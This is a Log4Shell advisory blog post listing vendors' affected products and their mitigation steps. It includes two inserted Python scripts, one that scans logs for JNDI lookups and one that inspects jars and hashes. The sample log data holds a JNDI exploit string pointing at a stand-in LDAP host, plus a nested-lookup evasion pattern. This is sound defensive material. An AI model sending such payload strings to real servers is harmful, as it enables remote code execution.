
Log4Shell is a 0-day vulnerability with Critical Impact

Last Thursday, a new zero-day vulnerability, called Log4Shell, was detected in Log4j, a Java logging framework broadly used in enterprise environments to record events and messages generated by software applications. According to security researchers, the vulnerability had been under attack for more than a week prior to its public disclosure.

Update: It was found that the fix for CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), to craft malicious input data using a JNDI Lookup pattern, resulting in a denial of service (DoS) attack. Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.

How does CVE-2021-44228 work?

The flaw is a remote code execution vulnerability in Log4j. All an adversary needs to do to exploit it is send a specially crafted string containing the malicious code that gets logged by Log4j version 2.0 or higher; this lets the threat actor load arbitrary code from an attacker-controlled domain onto a susceptible server and take control of it.
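As an added example (not code from the original post or from any vendor listed below), the following Python script runs a simple detection over constructed log lines for the lookup pattern described above: the JNDI lookup prefix is flagged as high severity, a lookup nested inside another lookup as medium, and any other ${prefix:...} lookup syntax arriving in user-supplied input as low. The regular expressions and the sample lines are assumptions made for illustration, not the signatures of any particular product, and the quoted field at the end of each line stands for a user-controlled value such as a User-Agent header.

```python
import re
from typing import Dict, List

# Constructed sample log lines (not captured traffic). The quoted field at the
# end stands for a user-controlled value, such as a User-Agent header, that an
# application passes to Log4j.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /login HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.7 - - "GET /api/items?id=42 HTTP/1.1" 200 "curl/7.79.1"',
    '10.0.0.9 - - "GET / HTTP/1.1" 404 "${jndi:ldap://lookup.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 404 "${${ctx:loginId}}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 404 "${date:yyyy-MM-dd}"',
]

# The JNDI lookup prefix that Log4j 2.0 - 2.14.x resolves when it appears in a
# logged message (case-insensitive, tolerant of whitespace around the name).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A lookup opened inside another lookup: a second "${" before the outer "}"
# closes. Legitimate user input has no reason to contain this.
NESTED_LOOKUP = re.compile(r"\$\{[^}]*\$\{")
# Any Log4j-style lookup "${prefix:...}" (ctx, sys, env, date, ...).
ANY_LOOKUP = re.compile(r"\$\{\s*[a-z]+\s*:", re.IGNORECASE)


def classify_line(line: str) -> str:
    """Return 'high', 'medium', 'low' or 'clean' for a single log line."""
    if JNDI_LOOKUP.search(line):
        return "high"
    if NESTED_LOOKUP.search(line):
        return "medium"
    if ANY_LOOKUP.search(line):
        return "low"
    return "clean"


def scan_lines(lines: List[str]) -> List[Dict[str, str]]:
    """Classify every line; returns one record per line, in input order."""
    return [{"severity": classify_line(line), "line": line} for line in lines]


def summarize(lines: List[str]) -> Dict[str, int]:
    """Count lines per severity, e.g. to drive an alert threshold."""
    counts = {"high": 0, "medium": 0, "low": 0, "clean": 0}
    for record in scan_lines(lines):
        counts[record["severity"]] += 1
    return counts


if __name__ == "__main__":
    for record in scan_lines(SAMPLE_LOG_LINES):
        print(f"{record['severity']:<6} {record['line']}")
    print(summarize(SAMPLE_LOG_LINES))
```

Run it against an exported access or application log instead of SAMPLE_LOG_LINES to get a first triage; a non-zero "high" count means the lookup reached the logging layer and the hosts involved should be checked against the mitigation list below.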


List of affected software

Inter Engineering contacted our software partners to find out if their solutions are in any way affected by the Log4Shell vulnerability. Here is the list. If you have questions, or you are unsure whether your version is affected, send us a message.

Each entry below gives the vendor, the product name and the mitigation actions.

Vendor: Clearswift
Product: SEG (versions 5.3.0 & 5.4.0), SXG (versions 5.3.0 & 5.4.0), SIG (version 5.4.0)
Mitigation actions: Clearswift released version 5.4.1 that replaces the vulnerable version of Apache Log4j.

Vendor: Cryoserver
Product: Cryoserver Email Archiving
Mitigation actions: Not affected by CVE-2021-44228
Vendor: F-Secure
Product: Policy Manager (all versions)
Mitigation actions:

A deployable fix for this vulnerability was created. Follow the steps below.

  1. Download the patch from https://download.f-secure.com/corpro/pm/commons-java-log4j-nolookups.jar
  2. Check the SHA256 hash of the file if possible to verify its integrity. It should be 64f7e4e1c6617447a24b0fe44ec7b4776883960cc42cc86be68c613d23ccd5e0
  3. Stop the Policy Manager Server service
  4. Copy the downloaded file to
    • Windows Policy Manager: C:\Program Files (x86)\F-Secure\Management Server 5\lib\
    • Windows Endpoint Proxy: C:\Program Files\F-Secure\ElementsConnector\lib
    • Linux (all products): /opt/f-secure/fspms/lib
  5. Start the Policy Manager Server service

After the service restarts, the patch will automatically take effect.

Note: This patch only applies to version 14 and version 15 of the affected software. It will also apply to version 13, even though this version is out of support.

Policy Manager is not affected by CVE-2021-45046.

Product: Other F-Secure solutions
Mitigation actions: Not affected by CVE-2021-44228 or CVE-2021-45046

Vendor: HelpSystems
Product: GoAnywhere MFT version 5.7.0 or later, GoAnywhere Gateway version 2.7.0 or later, GoAnywhere MFT Agents 1.4.2 or later
Mitigation actions:

GoAnywhere will issue updates to mitigate risks from both vulnerabilities (CVE-2021-44228 and CVE-2021-45046). The updates will be made available through my.goanywhere.com. Until then, administrators can mitigate the risk from CVE-2021-44228 with the following actions.

GoAnywhere MFT (all affected versions), GoAnywhere Gateway (versions greater than or equal to 2.8.2) and GoAnywhere Agents (all affected versions)

Edit <INSTALL_DIR>/config/system.properties and add the following string:

log4j2.formatMsgNoLookups=true

Then restart the GoAnywhere service

GoAnywhere Gateway (versions between 2.7.0 and 2.8.2)

Edit (or create if it does not exist) <INSTALL_DIR>/gagateway.vmoptions and add the following string:

-Dlog4j2.formatMsgNoLookups=true

Edit (or create if it does not exist) <INSTALL_DIR>/bin/gagatewayd.vmoptions and add the following string:

-Dlog4j2.formatMsgNoLookups=true

Restart the gateway application

For more information go to the GoAnywhere page for the Log4Shell vulnerability.

Vendor: One Identity
Product: Safeguard for Privileged Sessions (version 6.x)
Mitigation actions: Disable the Safeguard Analytics functionality. This is the only component of Safeguard for Privileged Sessions that is impacted.

Vendor: OneSpan
Product: Authentication Server (all versions) Virtual Appliance, Authentication Server (all versions)
Mitigation actions:

OneSpan is working on releasing a hotfix. In the meantime we recommend limiting access to product components (e.g., web administration components, APIs) as much as possible.

If the product is accessible publicly, additional actions are required:

  1. Configure Web Application Firewall (WAF), if used, to block attempts to exploit the vulnerability. Customers should contact their WAF vendor to receive WAF rules to block attempts to exploit the Log4j vulnerability.
  2. Mitigate the vulnerability by configuring the Log4j library as follows:
    • Set the system property "log4j2.formatMsgNoLookups" to "true"; or
    • Remove the JndiLookup class from the classpath. In addition, Java 8u121 protects against remote code execution by defaulting the following parameters to "false": com.sun.jndi.rmi.object.trustURLCodebase, com.sun.jndi.cosnaming.object.trustURLCodebase.

These products are not affected by CVE-2021-45046.
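Two checks recur in the mitigation advice above: verifying a replaced jar against its published SHA-256 (the F-Secure patch step) and confirming that JndiLookup.class has been removed from log4j-core (OneSpan's second option). The following Python script automates both. It is an added example, not code from this post or from any vendor listed here: it reads the log4j-core version from the jar's pom.properties or manifest (an assumption about how the jar was built), reports whether JndiLookup.class is present, maps the result onto the fix status described at the top of the post, and compares the jar's hash against an expected value. The sample jars it builds are constructed stand-ins, not real Log4j releases.

```python
import hashlib
import hmac
import io
import re
import zipfile
from typing import Dict, Optional, Tuple

# Path of the lookup class inside log4j-core; the OneSpan workaround removes it.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Where the version is recorded (assumption: a Maven-built jar carries
# pom.properties; the manifest Implementation-Version is the fallback).
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
MANIFEST = "META-INF/MANIFEST.MF"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_sha256(data: bytes, expected_hex: str) -> bool:
    """Constant-time comparison against the published hash (hex, case-insensitive)."""
    return hmac.compare_digest(sha256_hex(data), expected_hex.strip().lower())


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def inspect_log4j_jar(jar_bytes: bytes) -> Dict[str, object]:
    """Read the version string and check for JndiLookup.class without extracting the jar."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        if version is None and MANIFEST in names:
            for line in zf.read(MANIFEST).decode("utf-8", "replace").splitlines():
                if line.startswith("Implementation-Version:"):
                    version = line.split(":", 1)[1].strip()
    return {"version": version, "jndi_lookup_present": JNDI_LOOKUP_CLASS in names}


def assess(report: Dict[str, object]) -> str:
    """Map the inspection result onto the fix status described in the post."""
    version = report["version"]
    has_jndi = report["jndi_lookup_present"]
    parsed = parse_version(version) if version else None
    if parsed is None:
        return "unknown version; JndiLookup.class " + ("present" if has_jndi else "absent")
    if parsed < (2, 0, 0):
        return f"Log4j {version}: outside the scope of CVE-2021-44228 (2.0 or higher)"
    if parsed >= (2, 16, 0):
        return f"fixed: {version} removes message lookups and disables JNDI by default"
    if not has_jndi:
        return f"mitigated: JndiLookup.class removed from {version}"
    if parsed == (2, 15, 0):
        return "incomplete fix: 2.15.0 leaves CVE-2021-45046 in non-default configurations, upgrade to 2.16.0"
    # The 2.12.x and 2.3.x backport releases for older Java are not modelled here.
    return f"vulnerable: {version} exposes CVE-2021-44228, upgrade to 2.16.0 or remove JndiLookup.class"


def build_sample_jar(version: str, include_jndi: bool) -> bytes:
    """Constructed stand-in for a log4j-core jar containing only the entries this check reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(MANIFEST, f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        zf.writestr(POM_PROPERTIES, f"version={version}\nartifactId=log4j-core\n")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class
    return buf.getvalue()


if __name__ == "__main__":
    for ver, jndi in [("2.14.1", True), ("2.14.1", False), ("2.15.0", True), ("2.16.0", True)]:
        jar = build_sample_jar(ver, jndi)
        print(sha256_hex(jar)[:16], assess(inspect_log4j_jar(jar)))
```

To use it on a real installation, read the jar from the lib directory named in the vendor's procedure (for example with open(path, "rb").read()), pass the bytes to inspect_log4j_jar and assess, and pass the vendor's published hash to verify_sha256 before restarting the service.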

Vendor: Stormshield
Product: UTM Appliance (all versions)
Mitigation actions: Not affected by CVE-2021-44228 or CVE-2021-45046

Vendor: Wallix
Product: Access Manager (all versions)
Mitigation actions:

In order to mitigate vulnerability CVE-2021-44228, please contact us to receive the patch files. Then follow the procedure below:

1) Access Manager application installed on Linux

- Transfer the attached log4j-core-2.8.2.jar file to the server

- Locate the file log4j-core-2.8.2.jar on the server, by default it is in the Access Manager directory in /opt/wallix/wabam/lib

- Make a backup of the file

cp log4j-core-2.8.2.jar log4j-core-2.8.2.jar.bak

- Replace the log4j-core-2.8.2.jar file with the one you retrieved from the KB

cp ./log4j-core-2.8.2.jar /opt/wallix/wabam/lib/log4j-core-2.8.2.jar

- Verify the hash of the copied file with the .sha256sum you downloaded before

sha256sum /opt/wallix/wabam/lib/log4j-core-2.8.2.jar
--> d5b5002eeb6471a6026269723821c8a7461c92051a931889d5af53659d6710a1 /opt/wallix/wabam/lib/log4j-core-2.8.2.jar

- Restart Access Manager service

systemctl restart wabam

 

2) Access Manager application installed on Windows

- Transfer the attached log4j-core-2.8.2.jar file to the server

- Locate the file log4j-core-2.8.2.jar on the server, by default it is in the Access Manager directory in C:\Program Files\WALLIX\wabam\lib

- Make a backup of the file

- Replace the log4j-core-2.8.2.jar file with the one you retrieved from the KB

- From a PowerShell console, verify the hash of the copied file with the .sha256sum you downloaded before

Get-FileHash 'C:\Program Files\WALLIX\wabam\lib\log4j-core-2.8.2.jar'

- Restart the wabam / WALLIX Access Manager service

 

3) Access Manager as an appliance

- Transfer the attached log4j-core-2.8.2.jar file to the server, into /home/wabadmin

- Connect to the appliance as wabadmin and go root

super
sudo -i

- The following commands need to be entered as is

- Make a backup of the current file

docker cp access-manager_access_manager_1:/opt/wallix/wabam/lib/log4j-core-2.8.2.jar /home/wabadmin/log4j-core-2.8.2.jar.bak

- Replace the file with the one you retrieved from the KB

docker cp /home/wabadmin/log4j-core-2.8.2.jar access-manager_access_manager_1:/opt/wallix/wabam/lib/log4j-core-2.8.2.jar

- Verify the hash of the copied file with the .sha256sum you downloaded before

docker exec access-manager_access_manager_1 /usr/bin/sha256sum /opt/wallix/wabam/lib/log4j-core-2.8.2.jar
--> d5b5002eeb6471a6026269723821c8a7461c92051a931889d5af53659d6710a1 /opt/wallix/wabam/lib/log4j-core-2.8.2.jar

- Restart Access Manager service

docker restart access-manager_access_manager_1

 

Vendor: Wallix
Product: Bastion (all versions)
Mitigation actions: Not affected by CVE-2021-44228 or CVE-2021-45046

 

Public Sources

How attackers are trying to exploit Log4Shell

What you need to know about the Log4J vulnerability rocking the internet

Log4Shell Security Alert: Stormshield’s product response

CVE-2021-44228 Details

CVE-2021-45046 Details

CISA Apache Log4j Vulnerability Guidance